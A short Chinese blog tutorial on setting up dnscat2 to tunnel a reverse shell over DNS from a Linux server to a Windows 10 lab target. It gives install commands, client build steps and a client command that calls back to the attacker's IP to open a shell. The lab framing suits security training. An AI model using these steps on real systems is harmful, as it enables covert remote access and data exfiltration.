使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
devilnumber1 分钟前
Java Lambda 分片(分组 / 分区)超详细讲解
windows
霸道流氓气质1 分钟前
导入历史跟踪机制实战指南
java·linux·服务器
遇见火星1 分钟前
Jenkins + Ansible 集成实战:把配置管理焊进流水线里
运维·ansible·jenkins
肖爱Kun2 分钟前
GB28181启动传参的设计
linux·服务器·数据库
剑神一笑6 分钟前
Linux systemctl 服务管理命令:从 systemd 架构到实战技巧
linux·服务器·架构
Whoami!11 分钟前
02-【高校】校园网等保三级架构
网络安全·安全架构·拓扑
艾莉丝努力练剑11 分钟前
【Linux网络】传输层协议TCP(六)补充 - 面试题:HTTP 获取网页的完整过程
linux·运维·网络·tcp/ip·计算机网络·http·udp
norsd13 分钟前
CentOS Rocky Linux 设置 ip
linux·tcp/ip·centos
minji...18 分钟前
Linux高级IO(六)基于ET模式、单reactor反应堆的epoll版本的TCP计算服务器
linux·服务器·网络·c++·epoll·socket套接字·reactor反应堆模式
jcbut1 小时前
在Linux上安装Kingbase 9
linux·kingbase·人大金仓·电科金仓